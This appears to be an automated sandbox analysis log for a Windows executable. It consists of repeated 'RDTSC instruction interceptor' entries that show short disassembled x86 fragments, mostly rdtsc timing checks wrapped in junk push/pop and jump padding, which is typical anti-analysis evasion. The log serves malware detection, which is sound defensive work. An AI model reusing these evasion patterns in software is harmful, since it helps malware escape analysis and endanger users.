            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACCA1 second address: 5ACCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACCA7 second address: 5ACCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A6C second address: 5B0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A72 second address: 5B0A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A76 second address: 5B0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F45D50449B0h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A90 second address: 5B0AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44CE second address: 5B44EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F45D50449AFh 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44EB second address: 5B44F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F45D5047A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B465C second address: 5B4662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4662 second address: 5B4668 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4668 second address: 5B4674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B47D3 second address: 5B47D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B47D7 second address: 5B480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F45D50449B2h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F45D50449A6h 0x00000016 jmp 00007F45D50449B1h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B480A second address: 5B4816 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4816 second address: 5B481A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B624D second address: 5B6253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6253 second address: 5B6281 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45D50449A6h 0x00000008 jp 00007F45D50449A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007F45D50449AEh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a js 00007F45D50449A6h 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4950 second address: 5C496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F45D5047A26h 0x0000000a jmp 00007F45D5047A30h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8A8F second address: 5C8AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B5h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AA9 second address: 5C8ACD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D5047A39h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F45D5047A31h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA664 second address: 5CA66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA66A second address: 5CA66E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA66E second address: 5CA694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F45D50449B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA694 second address: 5CA6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45D5047A26h 0x0000000a jmp 00007F45D5047A2Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF13F second address: 5CF143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D646E second address: 5D6474 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6474 second address: 5D6478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D6478 second address: 5D647E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E1607 second address: 5E160B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE63 second address: 5DFE69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5DFE69 second address: 5DFE87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F45D50449B7h 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E001B second address: 5E001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E001F second address: 5E002C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45D50449A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E002C second address: 5E003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0186 second address: 5E018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E0466 second address: 5E0472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45D5047A26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E137F second address: 5E1387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E3B2E second address: 5E3B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E57B2 second address: 5E57B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E57B6 second address: 5E57EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F45D5047A26h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jbe 00007F45D5047A26h 0x00000011 popad 0x00000012 push edx 0x00000013 jmp 00007F45D5047A35h 0x00000018 js 00007F45D5047A26h 0x0000001e pop edx 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E57EE second address: 5E57F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5E57F5 second address: 5E57FF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F45D5047A2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 601223 second address: 601229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61639E second address: 6163C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D5047A2Eh 0x0000000b jmp 00007F45D5047A31h 0x00000010 popad 0x00000011 push ecx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6163C9 second address: 6163CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6168FC second address: 616917 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F45D5047A2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F45D5047A26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 616917 second address: 61691B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 61CBB3 second address: 61CBCB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F45D5047A32h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902AB second address: 4D902B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902B1 second address: 4D902B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D902B5 second address: 4D9030F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f mov dx, si 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 jmp 00007F45D50449B0h 0x0000001a mov edx, dword ptr [ebp+0Ch] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F45D50449AEh 0x00000024 adc ecx, 597E82F8h 0x0000002a jmp 00007F45D50449ABh 0x0000002f popfd 0x00000030 mov ah, C0h 0x00000032 popad 0x00000033 mov ecx, dword ptr [ebp+08h] 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 movzx ecx, bx 0x0000003c movsx edx, ax 0x0000003f popad 0x00000040 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9030F second address: 4D90315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90315 second address: 4D90319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90319 second address: 4D9031D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90339 second address: 4D9033D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9033D second address: 4D90343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90343 second address: 4D90362 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90362 second address: 4D90366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90366 second address: 4D9036A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D9036A second address: 4D90370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB06FD second address: 4DB0703 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0703 second address: 4DB0709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0709 second address: 4DB070D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB070D second address: 4DB07C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F45D5047A33h 0x00000010 adc ecx, 542C642Eh 0x00000016 jmp 00007F45D5047A39h 0x0000001b popfd 0x0000001c push esi 0x0000001d movsx edx, cx 0x00000020 pop eax 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 jmp 00007F45D5047A2Fh 0x00000028 mov ebp, esp 0x0000002a jmp 00007F45D5047A36h 0x0000002f xchg eax, ecx 0x00000030 jmp 00007F45D5047A30h 0x00000035 push eax 0x00000036 jmp 00007F45D5047A2Bh 0x0000003b xchg eax, ecx 0x0000003c jmp 00007F45D5047A36h 0x00000041 xchg eax, esi 0x00000042 jmp 00007F45D5047A30h 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d popad 0x0000004e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07C5 second address: 4DB07CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07CB second address: 4DB07F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b jmp 00007F45D5047A33h 0x00000010 lea eax, dword ptr [ebp-04h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07F2 second address: 4DB07F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07F6 second address: 4DB07FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB07FC second address: 4DB0823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F45D50449B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dh, D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0823 second address: 4DB0835 instructions: 0x00000000 rdtsc 0x00000002 mov cx, 8685h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov eax, edx 0x0000000f push edi 0x00000010 pop esi 0x00000011 popad 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0835 second address: 4DB0869 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449B0h 0x00000009 and cx, 8248h 0x0000000e jmp 00007F45D50449ABh 0x00000013 popfd 0x00000014 mov dx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0869 second address: 4DB086D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB086D second address: 4DB0873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0873 second address: 4DB088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A35h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0910 second address: 4DB0914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0010 second address: 4DB001F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB001F second address: 4DB0043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0043 second address: 4DB0047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0047 second address: 4DB005A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB005A second address: 4DB0060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0060 second address: 4DB0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0064 second address: 4DB00B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45D5047A2Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ax, 549Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F45D5047A38h 0x0000001c jmp 00007F45D5047A35h 0x00000021 popfd 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00B2 second address: 4DB00B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00B6 second address: 4DB00E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 jmp 00007F45D5047A2Ch 0x0000000e push FFFFFFFEh 0x00000010 jmp 00007F45D5047A30h 0x00000015 push 2A46FB53h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00E8 second address: 4DB00EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00EC second address: 4DB00F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB00F2 second address: 4DB0132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449ABh 0x00000009 sbb cl, 0000007Eh 0x0000000c jmp 00007F45D50449B9h 0x00000011 popfd 0x00000012 mov si, 0AC7h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xor dword ptr [esp], 5D4B651Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0132 second address: 4DB0136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0136 second address: 4DB013C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB013C second address: 4DB01A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F45D5047A29h 0x0000000e pushad 0x0000000f push eax 0x00000010 pushfd 0x00000011 jmp 00007F45D5047A2Dh 0x00000016 adc esi, 46661C16h 0x0000001c jmp 00007F45D5047A31h 0x00000021 popfd 0x00000022 pop ecx 0x00000023 mov cx, dx 0x00000026 popad 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F45D5047A39h 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB01A0 second address: 4DB01FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e mov ebx, 21330262h 0x00000013 pushfd 0x00000014 jmp 00007F45D50449B3h 0x00000019 or ecx, 7903535Eh 0x0000001f jmp 00007F45D50449B9h 0x00000024 popfd 0x00000025 popad 0x00000026 mov eax, dword ptr [eax] 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b movzx eax, di 0x0000002e mov eax, edi 0x00000030 popad 0x00000031 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB01FF second address: 4DB0205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
